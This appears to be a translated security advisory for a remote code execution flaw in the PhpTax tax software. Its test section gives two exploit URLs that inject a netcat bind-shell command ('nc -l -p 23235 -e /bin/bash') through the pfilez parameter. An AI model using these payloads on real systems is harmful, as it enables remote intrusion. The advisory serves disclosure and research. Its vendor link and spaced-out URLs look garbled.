Release date:
Updated on:
Affected Systems:
Sourceforge PhpTax <= 0.8
Description:
--------------------------------------------------------------------------------
PhpTax is the U.S. income tax calculation software.
PhpTax has a security vulnerability and can be exploited to cause remote code execution attacks.
<* Source: Jean Pascal Pereira
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Bindshell on port 23235 using netcat:
Http: // localhost/phptax/drawimage. php? Pfilez = xxx; % 20nc % 20-l % 20-v % 20-p % 2023235% 20-e % 20/bin/bash; & pdf = make
** Exploit-DB Verified :**
Http: // localhost/phptax/index. php? Pfilez = 1040d1-pg2.tob; nc % 20-l % 20-v % 20-p % 2023235% 20-e % 20/bin/bash; & pdf = make
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://jocr.sourceforge.net/index.html